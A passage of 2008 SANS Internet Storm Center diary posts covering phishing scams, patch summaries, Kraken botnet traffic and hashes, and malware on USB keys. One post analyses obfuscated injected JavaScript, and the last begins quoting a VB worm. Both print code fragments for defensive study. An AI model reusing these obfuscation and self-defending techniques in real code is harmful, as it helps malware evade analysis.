Late last week, SRI made its new "Malware Threat Center" live. It summarized a lot of the information SRI receives from systems like bothunter. Great resource! (And I think they are looking for some graduate student interns).

0 Comments

Published: 2008-04-14

A Federal Subpoena or Just Some More Spam & Malware?

We've gotten a few reports that some CEOs have received what purports to be a federal subpoena via e-mail ordering their testimony in a case. It then asks them to click a link and download the case history and associated information. One problem, it's total bogus. It's a "click-the-link-for-malware" typical spammer stunt. So, first and foremost, don't click on such links. An interesting component of this scam was that it did properly identify the CEO and send it to his e-mail directly. It's very highly targeted that way.

Second, the United States Federal Courts do not "serve" formal process over email. While there is an Electronic Case Management System, initial contact for a subpoena, lawsuit or other process is done the old fashioned way... someone serving you the old fashioned way. Presumably, if you did already get served you would have a lawyer handling the case for you. In that instance, the *lawyer*, not you, would be getting electronic notices from the court **after service has been handled**.

FOR LAWYERS ONLY: Some key points for lawyers who are concerned about this. You know what a CM/ECF email looks like. They are all formatted exactly the same and do not come with any pleading attached or inline with the e-mail itself. For the sake of not pointing out the flaws in this particular scam so they bad guys can "do it better" next time, I'm being somewhat vague here. All CM/ECF emails follow the same general format, have the same syntax in their subject, and look very form-based in the body. You've gotten thousands of these, if you see something radically different, I would log in directly into the CM/ECF system and check the docket record directly. Don't click on the links if you are suspicious. I'm sure a call to the Clerk of the Court would also help you get information. Odds are the Clerk has heard of these kind of e-mails circulating. But if you pay attention, the "fakeness" of these subpoenas should be obvious to you, the errors are pretty egregious. There are only two links that should be clickable links in these e-mails... you've gotten thousands, you know which two I'm talking about. Also, pay attention to the URL given in these emails.

FOR EVERYONE ELSE: If you get subpoenas, take it to a lawyer. Don't click on links. And most importantly, no one renders service through e-mail right now, and if you tried it wouldn't "count". If you have doubts, call the Clerk of the Court, the opposing party or a lawyer.

It would be nice if the CM/ECF e-mails were PGP signed or otherwise digitally signed to ensure authenticity and this scam might encourage them to take that step. However, key point, if you are not a lawyer (or not representing yourself pro se and have ECF access) you will never get an e-mail from the court.

TECHNICAL DETAILS: The malicious code that gets downloaded is a CAB with acrobat.exe inside. There is good AV coverage of this right now it looks like. The malware then creates a Browser Helper Object (BHO) at %WINDIR%\system32\acrobat.dll and opens a hidden IE window to communciate to the command and control server. The BHO will also steal any installed certificates installed on the system. The C&C server is hard-coded to an ISP in Singapore at this time. (Thanks to Matt Richard of Verisign for the info).

UPDATE 13:04 CDT: Here is the VirusTotal results... guess coverage isn't that good. If you have someone infected, backup data and reinstall, targetted phishes like this ought to concern us more than general ones, and the only way to be safe is to "burn it down" and start over if an infection happens.

UPDATE 13:14 CDT: Here is another malware varient of the same thing, but VirusTotal only has 3/32.

--
John Bambenek / bambenek {at} gmail [dot] com

0 Comments

Published: 2008-04-13

Deja-Vu - database attack vector development

Over on the McAfee Avert Labs Blog, analysts Shinsuke Honjo and Geok Meng Ong have posted additional analysis of the Fribet trojan. The trojan "loads the “SQL Native Client” ODBC library, and is designed to receive arbitrary SQL statements from a command and control server. In turn, the ODBC library provides the functionality to Fribet to bind SQL connections and run arbitrary SQL commands from the victim machine(s)". A bit later they note "The attacker still needs to find out the information required to connect the database such as DSN, hostname, database name, User and Password, however, that information can be collected via other monitoring functions".

All your databases accessed by database support are theirs ( ; ^ (

0 Comments

Published: 2008-04-13

Oracle April Patch Advance Information Posted

Oracle has posted it's advance information for it's Critical Patch Update for April 2008, to be released on Tuesday, April 15, 2008.

"The highest CVSS 2.0 base score of vulnerabilities across all products is 6.6 for servers and 9.3 for Application Server clients".

Oracle Critical Patch Update Pre-Release Announcement - April 2008

0 Comments

Published: 2008-04-11

ADSL Router / Cable Modem / Home Wireless AP Hardening in 5 Steps

Last month, we discussed the possibility of a D-Link Router worm for consumer network hardware. While there were particular problems with D-Link, there are dangers in all consumer network hardware that require the attention of everyone that installs these devices regardless of the vendor. Taking a device out of the box, plugging it in and letting it go can expose you to "worms" or other remote-based exploitation. This stems from a similar problem with software and operating systems, namely, these things do not ship in a secure-by-default configuration. Here are 5 easy steps to take when you get a network device / access point to harden yourself against "easy" exploitation (and this applies to ALL hardware):

1) Change the default passwords, preferably to a strong password (at least 8 characters the include upper/lower case, numbers, special characters). Many of these devices ship with a password of "password" or "admin" and that is just asking for someone to kick over your router.

2) Disable remote administration. Administration of your router / access point should be "local only", namely, there is no reason to let people from another country access to your network hardware. If you need to make changes, you should be local to the device (i.e. physically connected, internal side of the network, etc).

3) Update the firmware. Believe it or not, consumer network hardware needs to be patched also. Check the support site of the vendor of the device when you get it and check for an update. Sign up for e-mail alerts for updates, if available, or check back on a regular basis for updates.

4) Disable unused services. Many of these devices are "feature rich" and enable these features by default even though 95% of users will never use them. Turn of SNMP, UPNP, "DMZ" features, etc. SNMP, particularly, allows someone to grab all the device settings of your device especially if the community string is "public" (and by default, 99% of the time it is). This is big and likely will lead to the largest amount of exploitation, namely, open SNMP that gives away all your settings to the world on request.

5) Change the default settings of the device. All vendors tend to use the same set of default settings for their devices, such as IP addresses of the internal network. Change these settings to something that makes sense for what you are trying to do. Changing default settings for wireless is also important, especially doing WPA2 authentication and not WEP. Hardening access points is its own topic though as well.

6) (Okay there is more than 5), Submit your logs to DShield. Here is a nice guide on how to accomplish sending your logs from these kind of devices to us. The more submitters we have, the more complete picture of what is going on and the better intelligence we have to share with you. Especially in the consumer ISP space, there is lots of action that would be helpful for us to see.

--
John Bambenek / bambenek [at] gmail {dot} com

1 Comments

Published: 2008-04-10

Abuse Contacts

A couple of months ago my boss asked me to take over the Abuse for our company. Little did I know when he asked me to take over the abuse it was I who would be abused. This has been a real eye opener for me and I have learned some very valuable lessons and have a few more gray hairs than I used to have. One of the things that I have learned is that finding someone who can explain to you why your server has been forbidden is like looking for a needle in a haystack.

One of our servers that hosts multi customers was blocked by one of the big boys. Now the only way I new it was blocked was because I started getting bombarded with complaints from our customers that the email that they were trying to send to a "group" of people were rejecting. I asked them to send me some of the emails so that I could look at them. I hadn't gotten any abuse reports or emails from the company inspite of the fact that I do have an abuse@ email address setup. Therefore, I had nothing to go on. After a couple of days and begging and pleading for someone at the company to point me in the right direction I have found out what was going on and the mail is flowing again.

I, for one wish everyone would handle these incidents the same way. I wish that an email could be sent to the abuse@ email address saying - hey bozo - you got a problem - clean up your act. Well maybe a little bit nicer. At any rate, not notifying us that we are being blocked and why we are being blocked is just not very nice. I just spent the better part of 2 days digging through logs, looking at RBL sites and attempting to find someone who could explain why my server was being "spanked".

So for those of you out there that just pull the plug, maybe you could also send the abuse@ email address a little message. I don't mind so much the pulling of the plug, but mind the hours that I spent trying to figure out why the plug was pulled.

I would rather have a little abuse from you then a lot of abuse from a lot of customers.

6 Comments

Published: 2008-04-10

DSLReports Being Attacked Again

We received an email from one of our faithful reader's just a few minutes ago letting us know that the folks at dslreports.com are having a rather bad day again. It seems that they are receiving a DDOS aimed at their pages and causing their site to either be slow to load or inaccessible.

The site is back up now. They have posted an announcement on the site "Unfortunately an ongoing distributed denial of service attack from Russia is causing problems for us today." So if you have problems connecting to their site, be patient and try again.

www.dslreports.com/

To the folks at DSL Reports. We wish you the best and hope that you can fend off the attacks and stay on line.

A big thank-you to Robert for calling this to our attention.

0 Comments

Published: 2008-04-10

Symantec Threatcon Level 2

It appears that Symantec has raised the Threatcon to Level 2 this afternoon.

www.symantec.com/security_response/threatcon/index.jsp

It seems that their honeypots have sniffed out "In-the-Wild Exploit attempts" targeting the vulnerability identified in MS08-021 which allows remote code execution in GDI if a user opens a specially crafted EMF or WMF image file. Microsoft announced this in their latest super Tuesday release.

www.microsoft.com/technet/security/Bulletin/MS08-021.mspx

If you haven't already patched do so now and don't forget to remind your users not to open image files.

0 Comments

Published: 2008-04-09

What’s up with 14323?

We had one reader submit a question with regards to lots of blocked traffic.
Most of the blocked traffic was towards 14323 and alternated between udp and tcp.
Some of the blocked traffic targeted 33435 too. I edited his logs slightly to protect the submitter’s identity and to eliminate some of the "duplicates". If you have additional information or packets please provide them via our contacts link.

Wed Apr 09 11:37:21 2008 Unrecognized attempt blocked from 91.122.128.9:11125 to victim’s_ip UDP:14323
Wed Apr 09 11:37:21 2008 Unrecognized attempt blocked from 91.122.128.9:11125 to victim’s_ip UDP:14323
Wed Apr 09 11:37:22 2008 Unrecognized attempt blocked from 91.122.128.9:11125 to victim’s_ip UDP:14323
Wed Apr 09 11:37:22 2008 Unrecognized attempt blocked from 91.122.128.9:11125 to victim’s_ip UDP:14323
Wed Apr 09 11:44:02 2008 Unrecognized attempt blocked from 91.122.52.114:3283 to victim’s_ip TCP:14323
Wed Apr 09 11:44:05 2008 Unrecognized attempt blocked from 91.122.52.114:3283 to victim’s_ip TCP:14323
Wed Apr 09 11:45:04 2008 Unrecognized attempt blocked from 78.60.140.172:19132 to victim’s_ip UDP:14323
Wed Apr 09 12:52:52 2008 Unrecognized attempt blocked from 66.35.46.201:11354 to victim’s_ip UDP:33435
Wed Apr 09 12:52:57 2008 Unrecognized attempt blocked from 66.35.46.201:11354 to victim’s_ip UDP:33435
Wed Apr 09 12:53:27 2008 Unrecognized attempt blocked from 78.60.140.172:19132 to victim’s_ip UDP:14323
Wed Apr 09 12:57:24 2008 Unrecognized attempt blocked from 122.162.33.190:21920 to victim’s_ip UDP:14323

2 Comments

Published: 2008-04-09

ISC Podcast Episode Number 2

Hey everyone, just to let you know we put out Episode 2 of the Internet Storm Center podcast today, as always available on iTunes: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=276609412 as well as on our website here: http://isc.sans.org/podcast.xml. The audio is getting better as I am getting better with Garageband. ;)

We discuss the hottest news from the past two weeks of the Internet Storm Center diaries, as well as our Microsoft "Reboot Wednesday" commentary on Microsoft's Tuesday's patches.

Also like to thank Paul and Larry of Pauldotcom's podcast for mentioning us! We appreciate it!

Joel Esler

0 Comments

Published: 2008-04-09

Critical vulnerabilities in Adobe Flash Player

Adobe has released a security bulletin today, APSB08-11, to address multiple vulnerabilities in Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, that could lead to the potential execution of arbitrary code remotely. Additionally the update includes DNS rebinding attack and cross-domain policy countermeasures.

It is strongly recommended to update to the newest Adobe Flash Player version, 9.0.124.0!

Please, check your current Adobe Flash Player version on the "about" page (before and after applying the update), and run the test with all your Web browsers, such as IE (ActiveX control), Firefox and Safari. Each browser may have access to a different version and require a separate installation method. Specific instructions to update each OS and/or browser are available here, and remember you may require administrative access to your computer and restart your browser.

If you are a developer, check Adobe's warning about potential compatibility issues introduced by this update:
Due to the possibility that these security enhancements and changes may impact existing Flash content, content developers are advised to review this March 2008 Adobe Developer Center article to determine if the changes will affect their content, and to begin implementing necessary changes immediately to help ensure a seamless transition.

CVE's: CVE-2007-5275, CVE-2007-6243, CVE-2007-6637, CVE-2007-6019, CVE-2007-0071, CVE-2008-1655, CVE-2008-1654

--
Raul Siles
www.raulsiles.com

0 Comments

Published: 2008-04-08

Notes file viewer vulnerabilities

IBM released a technote titled: "Potential security vulnerabilities in Lotus Notes file viewers for Applix Presents, Folio Flat File, HTML speed reader, KeyView and MIME".

The vulnerabilites center around attached files of many types:

Text mail (MIME)
HTML speed reader (.htm)
Applix Presents (.ag)
Folio Flat File (.fff)
KeyView document viewing engine

Workarounds and on demand patches are available. Secunia (who reported the vulnerability to IBM) has an advisory on the same subject as well.

--
Swa Frantzen -- Gorilla Security

0 Comments

Published: 2008-04-08

April 2008 - Black Tuesday Overview

Overview of the April 2008 Microsoft patches and their status.

#	Affected	Contra Indications	Known Exploits	Microsoft rating	ISC rating(*)
#	Affected	Contra Indications	Known Exploits	Microsoft rating	clients	servers
MS08-018	Input validation vulnerability allows code execution when opening a malicious file.
MS08-018	Project CVE-2008-1088	KB 950183	No publicly known exploits	Critical	Critical	Important
MS08-019	Multiple input validation vulnerabilities allow code execution. Replaces MS07-030.
MS08-019	Visio CVE-2008-1089 CVE-2008-1090	KB 949032	No publicly known exploits	Important	Critical	Important
MS08-020	Windows' DNS client vulnerable to spoofing due to lack of entropy in a random number generator.
MS08-020	DNS client CVE-2008-0087	KB 945553	No publicly known exploits	Important	Critical	Critical
MS08-021	Heap overflows in opening EMF and WMF images and file name based stack overflow in opening EMF files allow code execution. Replaces MS07-046.
MS08-021	GDI CVE-2008-1083 CVE-2007-1087	KB 948590	No publicly known exploits	Critical	Critical	Important
MS08-022	Javascript and visual basic script engines allow code execution. Replaces MS06-023.
MS08-022	Scripting engines CVE-2008-0083	KB 944338	No publicly known exploits	Critical	Critical	Important
MS08-023	3rd party killbit for a Yahoo! Music Jukebox activeX control that could allow code execution.
MS08-023	ActiveX CVE-2008-1086	KB 948881	PoC exploits were posted on the internet	Critical	Critical	Important
MS08-024	Cumulative Internet Explorer patch. Adds protection for an unspecified vulnerability leading to code execution when visiting a compromised or malicious web site. Replaces MS08-010.
MS08-024	MSIE CVE-2008-1085	KB 947864	No publicly known exploits	Critical	Critical	Important
MS08-025	Input validation vulnerability in the windows kernel allows privilege escalation.
MS08-025	Windows kernel CVE-2008-1084	KB 941693	No publicly known exploits	Important	Critical	Critical

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

--
Swa Frantzen -- Gorilla Security

0 Comments

Published: 2008-04-08

Symantec's Global Internet Security Threat Report

One of our readers wrote in that Symantec has released its Global Internet Security Threat Report Volume XIII. They also have a shorter executive summary.

I found the overview of the underground market interesting as it's something I like to use in awareness sessions:

Source:the Symantec report mentioned above, page 23.
Goods and services	Percentage	Range of prices
Bank accounts	22%	$10-$1000
Credit cards	13%	$0.40-$20
Full identities	9%	$1-$15
eBay accounts	7%	$1-$8
Scams	7%	$2.5/week - $50/week for hosting. $25 for design
Mailers	6%	$1-$10
Email addresses	5%	$0.83/MB-$10/MB
Email passwords	5%	$4-$30
Drop (request or offer)	5%	10%-50% of total drop amount
Proxies	5%	$1.50-$30

If you have found uncommon gems in the 105 page long report, feel free to point them out to us.

--
Swa Frantzen -- Gorilla Security

0 Comments

http://www.threatexpert.com/report.aspx?uid=83128ea3-453a-46fe-884b-71d05677d3ed

Kraken Technical Details: UPDATED x3

Information has just started flowing on the Kraken diary from earlier. As of this moment, I still don't have a sample of this particular malware, but I do have some packet captures of the control traffic.

C&C sends UDP/447 to the victim with packet lengths varying between 66, 115, 116 and 117 bytes. There does not appear to be an obvious pattern in the payload itself. Right now there are about 100 or so hostnames associated with this from dyndns and yi.org. I will publish a list and update this post with that information shortly. According to some malware we believe to be associated with Kraken, it will also use TCP 447 and encode data in some unknown way. (For those with malware zoos, look for MD5s 31b68fe29241d172675ca8c59b97d4f4 and c05eb75e00d54a041a057934979fed6d. Allegedly, MD5 1d51463150db06bc098fef335bc64971 is associated as well). Some other related bins (c1d078b93df31d032cea89f25dc56362, 3a8bd37f9b33de4d29198d125030f587, b0e7ac28f0a899afa0fcdda5f1252675, 1c6d6f727ee55a5797c369f7aa4a0f38, f43bebf91ae2f5cf1f2ad5168bf9d202, ffc2e41d8e729c7b8622a8420767cfb5)

Word on the street is that this may already be detected and it looks like it is just part of the Bobax family of malware related to this article on Dark Reading from last year. It appears that this malware is what Kraken malware is using to infect machines to based on the work of others.

Here are some sample packets (this is payload data only, no header):

0000   4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c M.......1w...8..
0010   84 22 24 64 68 9e 4c 48                          ."$dh.LH

0000   4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 M...........G|..
0010   23 03 96 ed 57 ab 5c ea                          #...W.\.

0000   4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df M...............
0010   9e fc 0d 71 66 d6 b2 15                          ...qf...

0000   4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 M............?.6
0010   d5 26 51 9c 60 11 5d f2                          .&Q.`.].

You'll notice that the first 8 bytes are the same, those first 8 vary between different IP addresses, but the packets coming from the same IP all have that same first 8 bytes. This looks like some sort of session ID / signature that is used throughout the session.

If you are going to be in the malware / security research business, it is nice to let the security community know when you find what you believe to be new malware.

</End Commentary>

UPDATE: The md5 that Damballa is saying is associated with this malware is MD5: 1d51463150db06bc098fef335bc64971. I'm working with a copy from Project Malfease and will have an analysis later. A Virus Total scan of this binary came back as 5/32 (with the 5 that did detect doing so in non-descript ways like "suspicious file").

UPDATE 2 (4/8/2008 - 13:29 UTC): First things first, Emerging Threats has some test signatures to detect this botnet C&C traffic. You can see them here.

There are some Threat Expert reports on related malware that should give you a good list of hostnames to work with for right now.

http://www.threatexpert.com/report.aspx?uid=e32f00bb-6b26-477f-a0d6-307000a31924

http://www.threatexpert.com/report.aspx?uid=2b65a341-7f74-413c-9854-a6aca09450f5

http://www.threatexpert.com/report.aspx?uid=c431073f-4321-4bc0-a219-832a10f4f3a0

http://www.threatexpert.com/report.aspx?uid=d04fcd5b-b221-43d0-8dad-95e64ba57145

http://www.threatexpert.com/report.aspx?uid=63606940-900b-4e26-87d9-7453a1518ed6

http://www.threatexpert.com/report.aspx?uid=52accf15-a173-4f90-9482-b2634c151d87

UPDATE 3: (4/9/08 - 0030 UTC)

First, Brian Krebs has some good coverage of the Kraken incident and some of the back story going on between Damballa and some AV vendors. It also covers some neat technical details of how Damballa got the information on this botnet. Also, Threat Expert has a pretty good write-up on what they have for Kraken. They see that the initial "phone home" is over TCP/447, and subsequent communication is UDP/447. The detection is still look for port 447 traffic crossing your perimeter. That port was used by an old IBM OS for some database stuff. It doesn't appear to have been used in years. Emerging Threats has some sigs (see above), and the UDP packets seem to be pretty consistently 66, 115, 116, or 117 bytes for the *entire packet*.

--
John Bambenek / bambenek \at\ gmail {dot} com

0 Comments

Network Solutions Technical Difficulties? Enom too

It appears that Network Solutions is having some troubles. Their website is intermittently available and people are having trouble logging in to managed network solutions services (like webmail). Their phone lines have a recorded message confirming the problem. No other information as available at this point. Stay tuned.

Additionally, enom.com is reporting that they are having "unscheduled maintenance".

Digg is also saying that are "experiencing several known issues at the moment" but the site itself is up.

--
John Bambenek / bambenek \at\ gmail (dot) com

0 Comments

Got Kraken?

Out of the RSA Conference, there is news that there is a new botnet in town, over twice the size of the Storm Worm in town called Kraken. Researchers from Damballa have discovered and tracked it the last two weeks and I'm guessing from news reports have presented their findings at RSA. If you have details of this worm, detection mechanisms, malware samples, etc, please send us some.

--
John Bambenek / bambenek {at} gmail [dot] com

P.S. Humorous note... everytime I hear the word Kraken, I think of Ask A Ninja's review of Pirates of the Carribean. I think it's funny at least. No, you can't have that 5 minutes back.

1 Comments

HP USB Keys Shipped with Malware for your Proliant Server

A loyal ISC reader pointed us to this note from AUSCERT. The basic story is that HP has optional "floppy USB keys" for some of their Proliant servers. The 256 KB and 1 GB versions include a batch that also came with 'W32.Fakerecy' or W32.SillyFDC' designed to infect your machine if you insert them. The interesting note is that these keys seem only to be shipped for Proliant servers which could indicate an attempt to "target" by the attackers or that they just hit some factory and got lucky. Either way, with the prolific trail of stories of USB devices shipping with malware pre-installed, it is now an attack vector that we need to be concerned about. Here are some steps to protect yourself against USB-based (and Fireware, which isn't immune from these stunts) malware:

1) Take the vendor who made the device and do a google news search on it. Odds are you aren't the first to buy it and if it comes with badware it may be news. If you see a story about it, check the vendor webpage and see if you can compare serial numbers of infected/non-infected versions. If not, return it and get something similar. Additionally, you can check the vendor page, sometimes (but shamefully not enough) they do the right thing and let their customers know what to do.

2) Every time you get a USB device scan it for malware before you use it with your anti-virus software's latest DATs. This includes picture frames, USB keys, SD Cards, USB/Fireware harddrives, iPods, MP3 players, everything. If it can store data, you should scan it. Most (if not all) anti-virus software I've seen and used allows you to scan an entire drive. Every time you take a new trinket out of the box, scan it. Even if the vendor is reputable because you don't know what factory it came from.

3) If you do receive a malware hit, let us know via our contact page. Fair, this isn't the most important step, but also let the store know where you got it and the manufacturer of the device know. Depending on what product we are talking about, it may not be easy to find contact information, we can work on that too. We like malware samples, if you feel comfortable and know how to do it, send them to us. We will analyze and forward them on to our list of anti-virus vendors.

4) Even if you do not see any malware, there is a possibility you are not safe. If you notice "odd" behavior of your machine (connections to a random machine you don't know, changing your default homepage, etc), be wary. Update your DATs and scan again, or check mailing lists (or with us) to see if anyone else is having problems.

5) If you are a manufacturer/vendor of external data storage (USB, Fireware, etc), outsourcing may still make sense for you. But just because a business model meets the cost-benefit equation doesn't mean you can go "Baghdad Bob" about the risks (or costs) associated with outsourcing. Whatever is done outside your control is... outside your control. When you have a factory make these devices for you, scan them yourselves and examine them for signs of badware *before* you ship to the consumers. The extra QA step may cost you money up front, but build consumer good will. Consumers like companies that look out for them.

6) Turn off "autorun" software on your operating system. It makes life less convenient, but it saves you from automatically running software that you don't want. If you want complete safety and it doesn't void your warranty/ability to return the device or make the device irrelevant (such as USB keys provided by vendors of servers and appliances for updating software) format the drive completely using a data shredder or other tool to torch every single byte that is on the device.

I recommend that if you get a malware hit on a USB device to simply return it and get something else (unless there is no alternative). I don't see a point in keeping hardware that came preinstalled with malware, there is no telling what else is on there that isn't detected and you know it's already be tampered with. It's generally best practice to do a complete reinstall of an infected machine, I would posit the best practice for the purchase of an infected device is simply to return it while your window of return is still open. There are plenty of product chooses of picture frames, USB memory sticks, SD cards, USB/Fireware harddrives, etc that have not gotten hit with malware to worry about cleaning a compromised device.

UPDATE: It's not the first time USB keys for "targetted" victims has been found. CheckPoint recently got hit with some of their USB keys for "reset to factory default" devices to plug into some of their firewalls.

--
John Bambenek / bambenek \at\ gmail {dot} com

0 Comments

Published: 2008-04-06

Advanced obfuscated JavaScript analysis

When we got contacted by ISC reader Greg in Hungary, whose web server had been hacked and adorned with a couple of obfuscated JavaScript files, we expected a variant of the "nmidahena" injection and a closed case. JavaScript is an interpreted language, and while the obfuscation attempts we see are getting more creative, the scripts can usually still be coerced quite easily into divulging their secrets. ISC handler Lenny Zeltser teaches the SANS course on malware analysis, and ISC handler Bojan Zdrnja wrote the portion on JavaScript analysis for that course, so we are usually able to make short work of bad stuff.

Not so this time. This one was something new.

The file looked benign enough, the usual method to resolve one of these has been described elsewhere in detail, and involves removing the script tags, changing eval to print, and running the file through SpiderMonkey.

It worked. That apparently another step of de-obfuscation was needed didn't faze us. Same routine, hunt down the eval() calls, change to print, re-run through SpiderMonkey. Easy enough. But the resulting lines printed did not show the expected exploit script in all its badness, but rather simply said

arguments.callee
la'Sbjd

Now you might remember the diary that we ran a while back on the properties of arguments.callee.toString() and how this makes analysis harder. This method allows a function to reference itself, and hence allows a function to detect modifications to its own code. Changing eval() to print() changes the function string, and with it the result. This can usually be defeated by re-defining the eval() function into a simple call to print(), but not so in this case. So let's take a look at some of the protection features in detail.

#1: Simple obfuscation

xdxc=eval('a#rPgPu,mPe,n,t9sP.9ckaPl,lPe9e9'.replace(/[9#k,P]/g, ''))

All this does is make the string "arguments.callee" un-obvious for both human and automated analysis. If you look closely, you'll see that the replace() call substitutes 9#k,P with nothing, and hence turns the string into what it really is. While this technique is not in itself very savvy, the usage of eval() in this context makes it impossible to simply re-define eval() into print() as we tried. If we do so, xdxc does not end up containing the correct string, and the moment this variable gets used, the whole thing falls apart.

#2 Deriving the cipher key from the code itself

arguments.callee as used returns the entire "body" of the function called ppEwEu .. which is everything between the start and the closing curly bracket after the catch(e) clause. The function xFplcSbG() is then used to turn this entire function into a numeric cipher key that is dependent on the actual text in the code block, as well as on its length.

function xFplcSbG(mrF) {
    var rmO = mrF.length;
    var wxxwZl = 0, owZtrl = 0;
    while (wxxwZl < rmO) {
        owZtrl += mrF.charCodeAt(wxxwZl) * rmO;
        wxxwZl++;
    }
    return ("" + owZtrl);
}

It is obvious now why touching the code in any way leads to completely different results: A change of a single letter in the code, say, if we replace eval() by evil(), already changes the resulting cipher key significantly. A bigger change, like if we replace eval() with print(), throws the result into a different ballpark alltogether.

#3 Using the cipher key to decrypt the function arguments

nzoexMG=nuI.charCodeAt(sIoLeu)^xgod.charCodeAt(qcNz) is comparably simple - this section shifts the key derived above "over" the obfuscated string and uses an XOR operation between the two to obtain the cleartext.

There still is a way to decode such a self-defending function: Use Microsoft Script Editor (MSE). With MSE, you can set breakpoints in JavaScript code and check out variable contents at your leisure. Loaded into MSE with a breakpoint set on the second call to eval(), the script as obtained after the first decoding stage readily reveals its secret. The big downside of this method is, of course, that you are actually running the hostile code in an environment that well might be vulnerable to the exploit you are about to reveal. As they say in Script-Busters: Don't try any of this at home. Ever.

But it ain't over until the fat trojan runs...

Even after this stage, the code still had a couple of tricks up its sleeve. But we readily recognize the string "traff3.cn", and also a couple of artefacts like the text "iwf[rIa[mIeK" (iframe), which suggests that we are getting close.

#4 Using a function prototype instead of a function

We have no idea why - probably in the hope that automated script parsers do not have prototyping implemented. Or to confuse the human analyst - as you can see from the image above, the resulting pile of characters is not for the faint-hearted. With a little patience, the prototype can be readily split into its parts though.

#5 Using cookies

The install() function calls alreadyInstalled() to check if the script has already run. Install(), when complete, sets a browser cookie named "dhafcbeg", and this is what the alreadyInstalled() method verifies. This is no obfuscation mechanism per se, probably rather an attempt to keep the user's browser from turning sluggish from re-infections on heavily infected web pages. As a side-effect, this also makes analysis in SpiderMonkey harder though: SpiderMonkey has no "document" object and doesn't do cookies.

#6 Including the referer

One particularly nasty bit is the call to "document.location.host" in the getFrameURL() function. This retrieves the host name portion of the page currently displayed in the browser. For example, if "http://some.server.nul/bbs/board.php" had been infected with this obfuscated script, document.location.host would return "some.server.nul". This string is then used to build the path from where the next stage exploit is loaded! Again, if run in SpiderMonkey or even within Microsoft Script Editor, the origin page object - and hence the host string - would be empty. The bad guys check for this in the getFrameURL() function, and substitute the host name with a random 16 character hex string if no hostname is set.

When run from within an analysis environment, the resulting URL is therefore something like
34ce19ab20045c11.a004ebb329886522.3traff-dot-cn
whereas when run as a real exploit, the first random string would reflect the "host"
some.server.nul.a004ebb329886522.3traff-dot-cn

The bad guys seem to use this difference to automatically spot and ban whoever is not careful enough in tracking them - their web server stopped responding to two of the IP addresses that we used during our analysis. The site currently seems to be down, but it probably is still a very good idea not to try any of these URLs. Curiosity bricked the lap'.

When it still was active one week ago, the above URL redirected to www.google-analytics.com.urchin.js.7traff-dot-cn. Yes, someone is trying to be cute. From there, after another stage of obfuscation, it finally triggered MS06-014 to download and run a Keylogger Trojan. The probably only reason why such advanced obfuscation would be paired with such an old exploit is - that there are still sufficient unpatched systems out there for the exploit to work.

Thanks to Greg for the sample, and to ISC Handler Bojan Zdrnja for help with the analysis.

0 Comments

Published: 2008-04-06

Happenings in the Northeast US

On a quiet weekend it may have been a bit too quiet for some users in the Northeast US. One reader, we shall call him ‘Joe’ for anonymity purposes, pointed out that there may have been some serious outages of some sort in the Philadelphia area, particularly related to one particular carrier. I am currently asking all readers from the region to submit their input to our Contact page if they have anything to contribute. Right now I am deliberately withholding all the information that ‘Joe’ submitted to see if we get more collaborating evidence. Please, if you are in the Northeast US, and noticed any Internet difficulties over the last 24 hours, write in, let us know, and we’ll put everything together to try to find out what’s going on.

Thanx much,

Tony Carothers

Handler du’jour

1 Comments

Published: 2008-04-04

nmidahena

In case you haven't done so yet, consider blocking nmidahena-dot-com on your proxy. And don't go there to find out if it is bad. It is. Several high profile sites have apparently been hit with what is a continuation of the "iframe injection" that we've covered repeatedly.

1 Comments

Published: 2008-04-04

Tax day scams

With tax day getting closer in the U.S., the number of reports on related social engineering tricks are picking up as well. The e-mails are basically a re-hash of the Better Business Bureau scams that we covered a while back. As the e-mails still seem to be targeting mainly executives of a firm, the trick might still work. The current emails contain text in the style of

Dear [Name of Executive]
I am sorry but in order for [Name of Firm] to get a tax refund, all the fields must be completed.
Please complete the missing fields on the attached form and re-send it to me.

nicely adorned with bells&whistles to make it look like it really comes from the IRS. Another series uses the old "A tax complaint has been filed against you" line, which probably is less likely to get the Execs to click. But who doesn't want a refund...

Thanks to all ISC readers who have sent samples of this scam over the past days.

0 Comments

Opera fixes vulnerabilities and Microsoft announces April's fixes

Opera released a new version of their browser (9.27) that fixes two remotely exploitable vulnerabilities (http://www.opera.com/support/search/view/881/ and http://www.opera.com/support/search/view/882/). The update can be downloaded from http://www.opera.com/download/.

Microsoft also released advance notification about this month's black Tuesday. And it looks like it will be a busy day for sure: Microsoft announces 8 security advisories (5 critical and 3 important), as well as some other non-security patches. More information is available at http://www.microsoft.com/technet/security/bulletin/ms08-apr.mspx.

0 Comments

VB detection: is it so difficult?

One of our readers submitted a malware sample his machine got infected with recently. The sample was a worm written in Visual Basic, so it was an easy analysis.

The worm offered nothing new really – the only thing that surprised me was how destructive it is (today we normally see only sneaky malware that tries to stay on your system as long as possible). Except setting dozens of registry keys to disable certain executables from being run (such as Anti Virus programs, but simple programs as Notepad as well), it did something really nasty:

set yeah=fso.CreateTextFile("C:\Northstar.bat")
yeah.WriteLine "@echo off"
